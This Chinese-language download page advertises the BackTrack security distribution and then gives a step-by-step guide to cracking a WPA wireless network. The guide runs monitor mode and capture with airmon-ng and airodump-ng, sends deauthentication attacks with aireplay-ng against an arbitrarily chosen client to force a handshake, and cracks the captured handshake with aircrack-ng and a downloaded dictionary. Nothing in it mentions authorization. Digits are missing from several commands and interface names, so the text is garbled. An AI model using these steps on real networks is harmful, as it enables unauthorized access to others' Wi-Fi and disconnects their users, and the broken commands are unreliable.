⑴BackTrack是一款非常方便好用的系统装机软件,内置大量的网络安全检测工具及黑客破解软件,快速地对网络安全进行有效监测,可以支持简易的U盘启动、光盘启动和硬盘启动,有需要的用户欢迎前来下载。
⑵、支持破解WEP、WPA、WPA这三种加密方式的网络;
⑶、目的是帮助专业的安全人员在一个纯粹致力于hacking的系统环境中执行安全评估任务;
⑷、支持多种存储设备,每个安装包、内核配置、脚本和补丁完全为渗透测试者量身定制;
⑸、支持U盘启动,光盘启动,硬盘启动;
⑹、内置大量的网络安全检测工具及黑客破解软件。
⑺、BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。目前最新与最好用版本是BTR。
⑻、它能破解WEP,WPA/WPA加密方式的无线网络,前提是需要有足够强大的密码字典文件。
⑼、BT对于基于无线射频技术的硬件系统有很强的检测能力。
⑽、密码破解方面,在以往版本工具的基础上又加入了基于GPU的破解工具oclhashcat,分别为oclhashcat+(ATI,oclhashcat+(Nvidia,破解速度理论上可以达到传统CPU破解的百倍。
⑾、Apache和MySQL都被集成到了系统中,方便使用者搭建LAMP环境进行测试,包含有Injection,XSS,Snort等IDS(入侵检测系统工具。
⑿、打开虚拟机中的BackTrack系统,打开BackTrack中的终端,使用命令检测无线网卡是否存在,终端输入命令:iwconfig,如果BackTrack支持,一般为wlan。
⒀、BackTrack中,打开inter—》wicd work manager,扫描存在的无线网络;选择信号较好的无线网,点击properties,可以看到该AP的基本信息。
⒁、打开终端,输入命令:airmon-ng start wlan ,表示在第六个频道打开无线网卡wlan的监听模式;对选定的AP进行监控:airodump-ng -w nenew -c --bssid AP‘s MAC mon,这里的MAC就是上一步骤的图中圈定部分。
⒂、根据上一步骤的图,我们可以找到很多个Client客户端的MAC地址,从里面随便选个,打开一个新的终端,上一个终端不要关闭,后面还需要用到。在新终端中输入:aireplay-ng - -a AP’s MAC -c CP’s MAC mon,其中:-:表示采用deauth攻击模式,后面跟上攻击次数;-a后面跟AP的mac地址;-c后面跟客户端的mac地址;执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么离成功已经不远了。如果没有出现就继续重复命令(aireplay-ng - -a AP’s MAC -c CP’s MAC mon就ok了,直到出现握手。
⒃、对BackTrack握手抓到的包进行破解工作:
⒄终端输入:aircrack-ng -w password.txt -b AP’s MAC nenew.cap,其中的password.txt为我们需要预置的字典文件,字典文件网上很多,搜搜就有了。nenew.cap是抓到的包文件。保存后可能是nenew-.cap。